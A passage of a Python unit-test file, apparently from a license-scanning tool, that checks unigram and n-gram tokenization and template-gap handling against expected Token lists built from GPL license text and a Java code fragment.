Token(start_line=2, end_line=2, start_char=54, end_char=68, value=u'ver\xf6ffentlicht', gap=NO_GAP),
Token(start_line=3, end_line=3, start_char=1, end_char=12, value=u'weitergeben', gap=NO_GAP),
Token(start_line=3, end_line=3, start_char=13, end_char=16, value=u'und', gap=NO_GAP),
Token(start_line=3, end_line=3, start_char=17, end_char=21, value=u'oder', gap=NO_GAP),
Token(start_line=3, end_line=3, start_char=23, end_char=24, value=u'n', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=1, end_char=13, value=u'modifizieren', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=15, end_char=23, value=u'entweder', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=24, end_char=29, value=u'gem\xe4\xdf', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=30, end_char=37, value=u'version', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=38, end_char=39, value=u'3', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=40, end_char=43, value=u'der', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=44, end_char=50, value=u'lizenz', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=51, end_char=55, value=u'oder', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=57, end_char=61, value=u'nach', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=62, end_char=67, value=u'ihrer', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=68, end_char=74, value=u'option', gap=NO_GAP),
Token(start_line=5, end_line=5, start_char=1, end_char=6, value=u'jeder', gap=NO_GAP),
Token(start_line=5, end_line=5, start_char=7, end_char=15, value=u'sp\xe4teren', gap=NO_GAP),
Token(start_line=5, end_line=5, start_char=17, end_char=18, value=u'n', gap=NO_GAP),
Token(start_line=6, end_line=6, start_char=1, end_char=8, value=u'version', gap=NO_GAP),
Token(start_line=6, end_line=6, start_char=10, end_char=11, value=u'n', gap=NO_GAP),
Token(start_line=7, end_line=7, start_char=2, end_char=3, value=u'n', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=1, end_char=4, value=u'die', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=5, end_char=21, value=u'ver\xf6ffentlichung', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=22, end_char=25, value=u'von', gap=DEFAULT_GAP),
Token(start_line=8, end_line=8, start_char=38, end_char=45, value=u'erfolgt', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=46, end_char=48, value=u'in', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=49, end_char=52, value=u'der', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=53, end_char=61, value=u'hoffnung', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=63, end_char=66, value=u'da\xdf', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=67, end_char=69, value=u'es', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=70, end_char=75, value=u'ihnen', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=76, end_char=79, value=u'von', gap=NO_GAP),
Token(start_line=9, end_line=9, start_char=1, end_char=7, value=u'nutzen', gap=NO_GAP),
Token(start_line=9, end_line=9, start_char=9, end_char=10, value=u'n', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=1, end_char=5, value=u'sein', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=6, end_char=10, value=u'wird', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=12, end_char=16, value=u'aber', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=17, end_char=21, value=u'ohne', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=22, end_char=32, value=u'irgendeine', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=33, end_char=41, value=u'garantie', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=43, end_char=48, value=u'sogar', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=49, end_char=53, value=u'ohne', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=54, end_char=57, value=u'die', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=58, end_char=67, value=u'implizite', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=68, end_char=76, value=u'garantie', gap=NO_GAP),
Token(start_line=11, end_line=11, start_char=1, end_char=4, value=u'der', gap=NO_GAP),
Token(start_line=11, end_line=11, start_char=5, end_char=15, value=u'marktreife', gap=NO_GAP),
Token(start_line=11, end_line=11, start_char=17, end_char=18, value=u'n', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=1, end_char=5, value=u'oder', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=6, end_char=9, value=u'der', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=10, end_char=24, value=u'verwendbarkeit', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=25, end_char=28, value=u'f\xfcr', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=29, end_char=34, value=u'einen', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=35, end_char=45, value=u'bestimmten', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=46, end_char=51, value=u'zweck', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=53, end_char=60, value=u'details', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=61, end_char=67, value=u'finden', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=68, end_char=71, value=u'sie', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=72, end_char=74, value=u'in', gap=NO_GAP),
Token(start_line=13, end_line=13, start_char=1, end_char=4, value=u'der', gap=NO_GAP),
Token(start_line=13, end_line=13, start_char=5, end_char=8, value=u'gnu', gap=NO_GAP),
Token(start_line=13, end_line=13, start_char=9, end_char=16, value=u'general', gap=NO_GAP),
Token(start_line=13, end_line=13, start_char=18, end_char=19, value=u'n', gap=NO_GAP),
Token(start_line=14, end_line=14, start_char=1, end_char=7, value=u'public', gap=NO_GAP),
Token(start_line=14, end_line=14, start_char=8, end_char=15, value=u'license', gap=NO_GAP),
Token(start_line=14, end_line=14, start_char=17, end_char=18, value=u'n', gap=NO_GAP),
Token(start_line=15, end_line=15, start_char=2, end_char=3, value=u'n', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=1, end_char=4, value=u'sie', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=5, end_char=12, value=u'sollten', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=13, end_char=16, value=u'ein', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=17, end_char=25, value=u'exemplar', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=26, end_char=29, value=u'der', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=30, end_char=33, value=u'gnu', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=34, end_char=41, value=u'general', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=42, end_char=48, value=u'public', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=49, end_char=56, value=u'license', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=57, end_char=65, value=u'zusammen', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=66, end_char=69, value=u'mit', gap=DEFAULT_GAP),
Token(start_line=17, end_line=17, start_char=2, end_char=3, value=u'n', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=1, end_char=9, value=u'erhalten', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=10, end_char=15, value=u'haben', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=17, end_char=22, value=u'falls', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=23, end_char=28, value=u'nicht', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=30, end_char=39, value=u'schreiben', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=40, end_char=43, value=u'sie', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=44, end_char=46, value=u'an', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=47, end_char=50, value=u'die', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=51, end_char=55, value=u'free', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=56, end_char=64, value=u'software', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=65, end_char=75, value=u'foundation', gap=NO_GAP),
Token(start_line=19, end_line=19, start_char=2, end_char=3, value=u'n', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=1, end_char=4, value=u'inc', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=7, end_char=9, value=u'51', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=10, end_char=18, value=u'franklin', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=19, end_char=21, value=u'st', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=23, end_char=28, value=u'fifth', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=29, end_char=34, value=u'floor', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=36, end_char=42, value=u'boston', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=44, end_char=46, value=u'ma', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=47, end_char=52, value=u'02110', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=54, end_char=57, value=u'usa', gap=NO_GAP),
]
test_file = self.get_test_loc('analysis/unicode/12180.txt')
with codecs.open(test_file, encoding='utf-8') as test:
result = list(self.template_parsing(test))
assert expected == result
def test_process_template_does_not_crash_on_unicode_rules_text_1(self):
test_file = self.get_test_loc('analysis/unicode/12290.txt')
with codecs.open(test_file, encoding='utf-8') as test:
list(self.template_parsing(test))
def test_process_template_does_not_crash_on_unicode_rules_text_2(self):
test_file = self.get_test_loc('analysis/unicode/12319.txt')
with codecs.open(test_file, encoding='utf-8') as test:
list(self.template_parsing(test))
def test_process_template_does_not_crash_on_unicode_rules_text_3(self):
test_file = self.get_test_loc('analysis/unicode/12405.txt')
with codecs.open(test_file, encoding='utf-8') as test:
list(self.template_parsing(test))
def test_process_template_does_not_crash_on_unicode_rules_text_4(self):
test_file = self.get_test_loc('analysis/unicode/12407.txt')
with codecs.open(test_file, encoding='utf-8') as test:
list(self.template_parsing(test))
def test_process_template_does_not_crash_on_unicode_rules_text_5(self):
test_file = self.get_test_loc('analysis/unicode/12420.txt')
with codecs.open(test_file, encoding='utf-8') as test:
list(self.template_parsing(test))
def test_process_template_detects_non_well_formed_templatized_regions(self):
lines = u'abcd{{ef'
self.assertRaises(UnbalancedTemplateError, self.template_parsing, lines)
def test_process_template_handles_combination_of_well_formed_and_ill_formed_templates_2(self):
lines = u'}}{{{{abc}}ddd}}{{'
self.assertRaises(UnbalancedTemplateError, self.template_parsing, lines)
def test_process_template_can_parse_ill_formed_template(self):
tf = self.get_test_loc('analysis/ill_formed_template/text.txt')
lines = unicode_text_lines(tf)
result = list(self.template_parsing(lines))
expected_gaps = [30, 10, 60, 70, 20]
result_gaps = [x.gap for x in result if x.gap]
assert expected_gaps == result_gaps
et = self.get_test_loc('analysis/ill_formed_template/expected_grams.json')
result_dicts = [t._asdict() for t in result]
regen = False
if regen:
with codecs.open(et, 'w', encoding='utf-8') as out:
json.dump(result_dicts, out, indent=2)
with codecs.open(et, encoding='utf-8') as inp:
expected = json.load(inp)
assert expected == result_dicts
def test_token_positions_are_kept_same_for_unigrams_and_ngrams_with_template(self):
lines = u'some text is some text {{ }} in all cases\n \n'
unigrams = unigram_tokenizer(iter([lines]), template=False)
tunigrams = unigram_tokenizer(iter([lines]), template=True)
ngrams = ngram_tokenizer(iter([lines]), ngram_len=3, template=False)
tngrams = ngram_tokenizer(iter([lines]), ngram_len=3, template=True)
expected_start_end = (0, 7,)
def check_start_end(l):
l = list(l)
result = (l[0].start, l[-1].end,)
assert expected_start_end == result
check_start_end(unigrams)
check_start_end(tunigrams)
check_start_end(ngrams)
check_start_end(tngrams)
def test_plain_unigrams_from_templated_unigrams(self):
lines = [u'My old tailor {{3 John Doe}} is quite very rich']
unigrams = unigram_splitter(lines, splitter=template_splitter)
result = list(template_processor(unigrams))
expected = [
Token(start=0, start_line=0, start_char=0, end_line=0, end_char=2, end=0, gap=0, value=u'my'),
Token(start=0, start_line=0, start_char=3, end_line=0, end_char=6, end=0, gap=0, value=u'old'),
Token(start=0, start_line=0, start_char=7, end_line=0, end_char=13, end=0, gap=3, value=u'tailor'),
Token(start=0, start_line=0, start_char=29, end_line=0, end_char=31, end=0, gap=0, value=u'is'),
Token(start=0, start_line=0, start_char=32, end_line=0, end_char=37, end=0, gap=0, value=u'quite'),
Token(start=0, start_line=0, start_char=38, end_line=0, end_char=42, end=0, gap=0, value=u'very'),
Token(start=0, start_line=0, start_char=43, end_line=0, end_char=47, end=0, gap=0, value=u'rich'),
]
assert expected == result
class TestLegacyNgrams(FileBasedTesting):
test_data_dir = os.path.join(os.path.dirname(__file__), 'data')
def test_plain_ngrams_processor(self):
from collections import deque
def ngram_processor(items, ngram_len):
"""
Given a sequence or iterable of arbitrary items, return an iterator of
item ngrams tuples of length ngram_len. Buffers at most ngram_len iterable
items.
For example::
>>> list(ngram_processor([1, 2, 3, 4, 5], ngram_len=3))
[(1, 2, 3), (2, 3, 4), (3, 4, 5)]
"""
ngram = deque()
current_len = 0
for item in items:
if current_len == ngram_len:
yield tuple(ngram)
ngram.popleft()
current_len -= 1
ngram.append(item)
current_len += 1
yield tuple(ngram)
text = (
u'''/*COMMENT
COMMENT COMMENT
- COMMENT
*/
public static boolean activateSearchResultView() {
String defaultPerspectiveId= SearchUI.getDefaultPerspectiveId();
if (defaultPerspectiveId != null) {
IWorkbenchWindow window= SearchPlugin.getActiveWorkbenchWindow();
if (window != null && window.getShell() != null && !window.getShell().isDisposed()) {
try {
PlatformUI.getWorkbench().showPerspective(defaultPerspectiveId, window);
} catch (WorkbenchException ex) {
// show view in current perspective
}
}
}''')
expected = [
(u'comment', u'comment', u'comment', u'comment', u'public', u'static'),
(u'comment', u'comment', u'comment', u'public', u'static', u'boolean'),
(u'comment', u'comment', u'public', u'static', u'boolean',
u'activatesearchresultview'),
(u'comment', u'public', u'static', u'boolean',
u'activatesearchresultview', u'string'),
(u'public', u'static', u'boolean', u'activatesearchresultview',
u'string', u'defaultperspectiveid'),
(u'static', u'boolean', u'activatesearchresultview', u'string',
u'defaultperspectiveid', u'searchui'),
(u'boolean', u'activatesearchresultview', u'string',
u'defaultperspectiveid', u'searchui', u'getdefaultperspectiveid'),
(u'activatesearchresultview', u'string', u'defaultperspectiveid',
u'searchui', u'getdefaultperspectiveid', u'if'),
(u'string', u'defaultperspectiveid', u'searchui',
u'getdefaultperspectiveid', u'if', u'defaultperspectiveid'),
(u'defaultperspectiveid', u'searchui', u'getdefaultperspectiveid',
u'if', u'defaultperspectiveid', u'null'),
(u'searchui', u'getdefaultperspectiveid', u'if',
u'defaultperspectiveid', u'null', u'iworkbenchwindow'),
(u'getdefaultperspectiveid', u'if', u'defaultperspectiveid', u'null',
u'iworkbenchwindow', u'window'),
(u'if', u'defaultperspectiveid', u'null', u'iworkbenchwindow',
u'window', u'searchplugin'),
(u'defaultperspectiveid', u'null', u'iworkbenchwindow', u'window',
u'searchplugin', u'getactiveworkbenchwindow'),
(u'null', u'iworkbenchwindow', u'window', u'searchplugin',
u'getactiveworkbenchwindow', u'if'),
(u'iworkbenchwindow', u'window', u'searchplugin',
u'getactiveworkbenchwindow', u'if', u'window'),
(u'window', u'searchplugin', u'getactiveworkbenchwindow', u'if',
u'window', u'null'),
(u'searchplugin', u'getactiveworkbenchwindow', u'if', u'window',
u'null', u'window'),
(u'getactiveworkbenchwindow', u'if', u'window', u'null', u'window',
u'getshell'),
(u'if', u'window', u'null', u'window', u'getshell', u'null'),
(u'window', u'null', u'window', u'getshell', u'null', u'window'),
(u'null', u'window', u'getshell', u'null', u'window', u'getshell'),
(u'window', u'getshell', u'null', u'window', u'getshell', u'isdisposed'),
(u'getshell', u'null', u'window', u'getshell', u'isdisposed', u'try'),
(u'null', u'window', u'getshell', u'isdisposed', u'try', u'platformui'),
(u'window', u'getshell', u'isdisposed', u'try', u'platformui',
u'getworkbench'),
(u'getshell', u'isdisposed', u'try', u'platformui', u'getworkbench',
u'showperspective'),
(u'isdisposed', u'try', u'platformui', u'getworkbench',
u'showperspective', u'defaultperspectiveid'),
(u'try', u'platformui', u'getworkbench', u'showperspective',
u'defaultperspectiveid', u'window'),
(u'platformui', u'getworkbench', u'showperspective',
u'defaultperspectiveid', u'window', u'catch'),
(u'getworkbench', u'showperspective', u'defaultperspectiveid',
u'window', u'catch', u'workbenchexception'),
(u'showperspective', u'defaultperspectiveid', u'window', u'catch',
u'workbenchexception', u'ex'),
(u'defaultperspectiveid', u'window', u'catch', u'workbenchexception',
u'ex', u'show'),
(u'window', u'catch', u'workbenchexception', u'ex', u'show', u'view'),
(u'catch', u'workbenchexception', u'ex', u'show', u'view', u'in'),
(u'workbenchexception', u'ex', u'show', u'view', u'in', u'current'),
(u'ex', u'show', u'view', u'in', u'current', u'perspective'),
]
unigrams = (x.value for x
in unigram_splitter(text.splitlines()))
result = list(ngram_processor(unigrams, ngram_len=6))
assert expected == result
class TestNgrams(FileBasedTesting):
test_data_dir = os.path.join(os.path.dirname(__file__), 'data')
def test_tokens_ngram_processor_bigrams_from_unigrams(self):
text = u'this is some text \n on multiple lines'
unigrams = unigram_splitter(text.splitlines())
result = list(tokens_ngram_processor(unigrams, ngram_len=2))
expected = [
(Token(start_line=0, start_char=0, end_line=0, end_char=4, value=u'this'),
Token(start_line=0, start_char=5, end_line=0, end_char=7, value=u'is')),
(Token(start_line=0, start_char=5, end_line=0, end_char=7, value=u'is'),
Token(start_line=0, start_char=8, end_line=0, end_char=12, value=u'some')),
(Token(start_line=0, start_char=8, end_line=0, end_char=12, value=u'some'),
Token(start_line=0, start_char=13, end_line=0, end_char=17, value=u'text')),
(Token(start_line=0, start_char=13, end_line=0, end_char=17, value=u'text'),
Token(start_line=1, start_char=1, end_line=1, end_char=3, value=u'on')),
(Token(start_line=1, start_char=1, end_line=1, end_char=3, value=u'on'),
Token(start_line=1, start_char=4, end_line=1, end_char=12, value=u'multiple')),
(Token(start_line=1, start_char=4, end_line=1, end_char=12, value=u'multiple'),
Token(start_line=1, start_char=13, end_line=1, end_char=18, value=u'lines'))
]
assert expected == result
def test_tokens_ngram_processor_n2_with_2_tokens(self):
text = u'this is'
unigrams = list(unigram_splitter(text.splitlines()))
expected = [
(Token(start_line=0, start_char=0, end_line=0, end_char=4, value=u'this'),
Token(start_line=0, start_char=5, end_line=0, end_char=7, value=u'is')),
]
result = list(tokens_ngram_processor(iter(unigrams), ngram_len=2))
assert expected == result
def test_tokens_ngram_processor_n3_with_2_tokens(self):
text = u'this is'
unigrams = list(unigram_splitter(text.splitlines()))
expected = [
(Token(start_line=0, start_char=0, end_line=0, end_char=4, value=u'this'),
Token(start_line=0, start_char=5, end_line=0, end_char=7, value=u'is')),
]
result = list(tokens_ngram_processor(iter(unigrams), ngram_len=3))
assert expected == result
def test_tokens_ngram_processor_n4_with_2_tokens(self):
text = u'this is'
unigrams = list(unigram_splitter(text.splitlines()))
expected = [
(Token(start_line=0, start_char=0, end_line=0, end_char=4, value=u'this'),
Token(start_line=0, start_char=5, end_line=0, end_char=7, value=u'is')),
]
result = list(tokens_ngram_processor(iter(unigrams), ngram_len=4))
assert expected == result
def test_tokens_ngram_processor_n10_with_2_tokens(self):
text = u'this is'
unigrams = list(unigram_splitter(text.splitlines()))
expected = [
(Token(start_line=0, start_char=0, end_line=0, end_char=4, value=u'this'),
Token(start_line=0, start_char=5, end_line=0, end_char=7, value=u'is')),
]
result = list(tokens_ngram_processor(iter(unigrams), ngram_len=10))
assert expected == result
def test_tokens_ngram_processor_n1_with_2_tokens(self):
text = u'this is'
unigrams = list(unigram_splitter(text.splitlines()))
expected = [
(Token(start_line=0, start_char=0, end_line=0, end_char=4, value=u'this'),),
(Token(start_line=0, start_char=5, end_line=0, end_char=7, value=u'is'),),
]
result = list(tokens_ngram_processor(iter(unigrams), ngram_len=1))
assert expected == result
def test_tokens_ngram_processor_3grams_from_unigrams_on_multilines(self):
text = u'this is some text \n on multiple lines'
unigrams = unigram_splitter(text.splitlines())
result = list(tokens_ngram_processor(unigrams, ngram_len=3))
expected = [
(Token(start_line=0, start_char=0, end_line=0, end_char=4, value=u'this'),
Token(start_line=0, start_char=5, end_line=0, end_char=7, value=u'is'),
Token(start_line=0, start_char=8, end_line=0, end_char=12, value=u'some')),
(Token(start_line=0, start_char=5, end_line=0, end_char=7, value=u'is'),
Token(start_line=0, start_char=8, end_line=0, end_char=12, value=u'some'),
Token(start_line=0, start_char=13, end_line=0, end_char=17, value=u'text')),
(Token(start_line=0, start_char=8, end_line=0, end_char=12, value=u'some'),
Token(start_line=0, start_char=13, end_line=0, end_char=17, value=u'text'),
Token(start_line=1, start_char=1, end_line=1, end_char=3, value=u'on')),
(Token(start_line=0, start_char=13, end_line=0, end_char=17, value=u'text'),
Token(start_line=1, start_char=1, end_line=1, end_char=3, value=u'on'),
Token(start_line=1, start_char=4, end_line=1, end_char=12, value=u'multiple')),
(Token(start_line=1, start_char=1, end_line=1, end_char=3, value=u'on'),
Token(start_line=1, start_char=4, end_line=1, end_char=12, value=u'multiple'),
Token(start_line=1, start_char=13, end_line=1, end_char=18, value=u'lines'))
]
assert expected == result
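# Based on the expected values below, an n-gram never spans a template gap:
# the token carrying a non-zero gap closes its group (possibly yielding a
# shorter tuple), and ngram_to_token (used in the merge tests further down)
# folds each tuple back into one Token whose value is the tuple of words and
# whose char span covers the whole group.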
def test_tokens_ngram_processor_with_template_gaps_basic(self):
lines = [u'My old {{3 John Doe}} is rich']
unigrams = unigram_splitter(lines, splitter=template_splitter)
templated = template_processor(unigrams)
result = list(tokens_ngram_processor(templated, ngram_len=3))
expected = [
(Token(start=0, start_line=0, start_char=0, end_line=0, end_char=2, end=0, gap=0, value=u'my'),
Token(start=0, start_line=0, start_char=3, end_line=0, end_char=6, end=0, gap=3, value=u'old'),
),
(Token(start=0, start_line=0, start_char=22, end_line=0, end_char=24, end=0, gap=0, value=u'is'),
Token(start=0, start_line=0, start_char=25, end_line=0, end_char=29, end=0, gap=0, value=u'rich'),
)
]
assert expected == result
def test_tokens_ngram_processor_with_template_gaps_merged(self):
lines = [u'My old tailor {{3 John Doe}} is quite very rich']
unigrams = unigram_splitter(lines, splitter=template_splitter)
templated = template_processor(unigrams)
ngram_len = 3
ngrams_tuples = tokens_ngram_processor(templated, ngram_len=ngram_len)
result = list(ngram_to_token(ngrams_tuples))
expected = [
Token(start_line=0, start_char=0, end_line=0, end_char=13, gap=ngram_len, value=(u'my', u'old', u'tailor')),
Token(start_line=0, start_char=29, end_line=0, end_char=42, gap=0, value=(u'is', u'quite', u'very')),
Token(start_line=0, start_char=32, end_line=0, end_char=47, gap=0, value=(u'quite', u'very', u'rich')),
]
assert expected == result
def test_tokens_ngram_processor_with_gaps_merged_short_grams(self):
lines = [u'My {{3 tailor Joe}} is quite {{ pleasant and }} very rich']
unigrams = unigram_splitter(lines, splitter=template_splitter)
templated = template_processor(unigrams)
ngram_len = 3
ngrams_tuples = tokens_ngram_processor(templated, ngram_len=ngram_len)
result = list(ngram_to_token(ngrams_tuples))
expected = [
Token(start=0, start_line=0, start_char=0, end_line=0, end_char=2, end=0, gap=3, value=(u'my',)),
Token(start=0, start_line=0, start_char=20, end_line=0, end_char=28, end=0, gap=5, value=(u'is', u'quite')),
Token(start=0, start_line=0, start_char=48, end_line=0, end_char=57, end=0, gap=0, value=(u'very', u'rich'))
]
assert expected == result
def test_tokens_ngram_processor_with_gaps_merged_short_and_long_grams(self):
lines = [u'My {{3 tailor Joe}} is quite {{ pleasant and }} very rich really rich']
unigrams = unigram_splitter(lines, splitter=template_splitter)
templated = template_processor(unigrams)
ngram_len = 3
ngrams_tuples = tokens_ngram_processor(templated, ngram_len=ngram_len)
result = list(ngram_to_token(ngrams_tuples))
expected = [
Token(start=0, start_line=0, start_char=0, end_line=0, end_char=2, end=0, gap=3, value=(u'my',)),
Token(start=0, start_line=0, start_char=20, end_line=0, end_char=28, end=0, gap=5, value=(u'is', u'quite')),
Token(start=0, start_line=0, start_char=48, end_line=0, end_char=64, end=0, gap=0, value=(u'very', u'rich', u'really')),
Token(start=0, start_line=0, start_char=53, end_line=0, end_char=69, end=0, gap=0, value=(u'rich', u'really', u'rich'))
]
assert expected == result
def test_ngram_to_token_processor_with_gaps_at_the_end(self):
lines = [u'My {{3 tailor Joe}} is quite {{ pleasant and }}']
unigrams = unigram_splitter(lines, splitter=template_splitter)
templated = template_processor(unigrams)
ngram_len = 3
ngrams_tuples = tokens_ngram_processor(templated, ngram_len=ngram_len)
result = list(ngram_to_token(ngrams_tuples))
expected = [
Token(start=0, start_line=0, start_char=0, end_line=0, end_char=2, end=0, gap=3, value=(u'my',)),
Token(start=0, start_line=0, start_char=20, end_line=0, end_char=28, end=0, gap=5, value=(u'is', u'quite'))
]
assert expected == result
def test_tokens_ngram_processor_with_gaps_at_the_end_does_not_yield_empty_tuples(self):
lines = [u'My {{3 tailor Joe}} is quite {{ pleasant and }}']
unigrams = unigram_splitter(lines, splitter=template_splitter)
templated = template_processor(unigrams)
ngram_len = 3
result = list(tokens_ngram_processor(templated, ngram_len=ngram_len))
assert (None, None, None,) != result[-1]
expected = [
(Token(start=0, start_line=0, start_char=0, end_line=0, end_char=2, end=0, gap=3, value=u'my'),),
(Token(start=0, start_line=0, start_char=20, end_line=0, end_char=22, end=0, gap=0, value=u'is'),
Token(start=0, start_line=0, start_char=23, end_line=0, end_char=28, end=0, gap=5, value=u'quite'),
)
]
assert expected == result
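# ngram_tokenizer is the end-to-end path: it combines splitting, template
# processing and n-gram grouping, and also numbers tokens with absolute
# start/end indices on top of line/char offsets, as the expected Tokens below
# show.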
def test_ngrams_tokenizer_does_not_yield_4grams_for_3grams(self):
lines = u'''Neither the name of {{10 the ORGANIZATION}} nor {{}}the names {{}}of its contributors may
materials provided with the distribution.'''.splitlines()
result = list(ngram_tokenizer(iter(lines), ngram_len=3, template=True))
expected = [
Token(start=0, start_line=0, start_char=0, end_line=0, end_char=16, end=2, gap=0, value=(u'neither', u'the', u'name')),
Token(start=1, start_line=0, start_char=8, end_line=0, end_char=19, end=3, gap=10, value=(u'the', u'name', u'of')),
Token(start=4, start_line=0, start_char=44, end_line=0, end_char=47, end=4, gap=5, value=(u'nor',)),
Token(start=5, start_line=0, start_char=52, end_line=0, end_char=61, end=6, gap=5, value=(u'the', u'names')),
Token(start=7, start_line=0, start_char=66, end_line=0, end_char=85, end=9, gap=0, value=(u'of', u'its', u'contributors')),
Token(start=8, start_line=0, start_char=69, end_line=0, end_char=89, end=10, gap=0, value=(u'its', u'contributors', u'may')),
Token(start=9, start_line=0, start_char=73, end_line=1, end_char=25, end=11, gap=0, value=(u'contributors', u'may', u'materials')),
Token(start=10, start_line=0, start_char=86, end_line=1, end_char=34, end=12, gap=0, value=(u'may', u'materials', u'provided')),
Token(start=11, start_line=1, start_char=16, end_line=1, end_char=39, end=13, gap=0, value=(u'materials', u'provided', u'with')),
Token(start=12, start_line=1, start_char=26, end_line=1, end_char=43, end=14, gap=0, value=(u'provided', u'with', u'the')),
Token(start=13, start_line=1, start_char=35, end_line=1, end_char=56, end=15, gap=0, value=(u'with', u'the', u'distribution'))
]
assert expected == result
def test_tokens_ngram_processor_with_gaps_merged_always_returns_3grams_when_requested(self):
lines = u'''Neither the name of {{10 the ORGANIZATION}} nor {{}}the
names {{}}of its contributors may materials provided with
the distribution.'''.splitlines()
unigrams = unigram_splitter(lines, splitter=template_splitter)
templated = template_processor(unigrams)
result = list(tokens_ngram_processor(templated, ngram_len=3))
expected = [
(Token(start=0, start_line=0, start_char=0, end_line=0, end_char=7, end=0, gap=0, value=u'neither'),
Token(start=0, start_line=0, start_char=8, end_line=0, end_char=11, end=0, gap=0, value=u'the'),
Token(start=0, start_line=0, start_char=12, end_line=0, end_char=16, end=0, gap=0, value=u'name')),
(Token(start=0, start_line=0, start_char=8, end_line=0, end_char=11, end=0, gap=0, value=u'the'),
Token(start=0, start_line=0, start_char=12, end_line=0, end_char=16, end=0, gap=0, value=u'name'),
Token(start=0, start_line=0, start_char=17, end_line=0, end_char=19, end=0, gap=10, value=u'of')),
(Token(start=0, start_line=0, start_char=44, end_line=0, end_char=47, end=0, gap=5, value=u'nor'),),
(Token(start=0, start_line=0, start_char=52, end_line=0, end_char=55, end=0, gap=0, value=u'the'),
Token(start=0, start_line=1, start_char=19, end_line=1, end_char=24, end=0, gap=5, value=u'names')),
(Token(start=0, start_line=1, start_char=29, end_line=1, end_char=31, end=0, gap=0, value=u'of'),
Token(start=0, start_line=1, start_char=32, end_line=1, end_char=35, end=0, gap=0, value=u'its'),
Token(start=0, start_line=1, start_char=36, end_line=1, end_char=48, end=0, gap=0, value=u'contributors')),
(Token(start=0, start_line=1, start_char=32, end_line=1, end_char=35, end=0, gap=0, value=u'its'),
Token(start=0, start_line=1, start_char=36, end_line=1, end_char=48, end=0, gap=0, value=u'contributors'),
Token(start=0, start_line=1, start_char=49, end_line=1, end_char=52, end=0, gap=0, value=u'may')),
(Token(start=0, start_line=1, start_char=36, end_line=1, end_char=48, end=0, gap=0, value=u'contributors'),
Token(start=0, start_line=1, start_char=49, end_line=1, end_char=52, end=0, gap=0, value=u'may'),
Token(start=0, start_line=1, start_char=53, end_line=1, end_char=62, end=0, gap=0, value=u'materials')),
(Token(start=0, start_line=1, start_char=49, end_line=1, end_char=52, end=0, gap=0, value=u'may'),
Token(start=0, start_line=1, start_char=53, end_line=1, end_char=62, end=0, gap=0, value=u'materials'),
Token(start=0, start_line=1, start_char=63, end_line=1, end_char=71, end=0, gap=0, value=u'provided')),
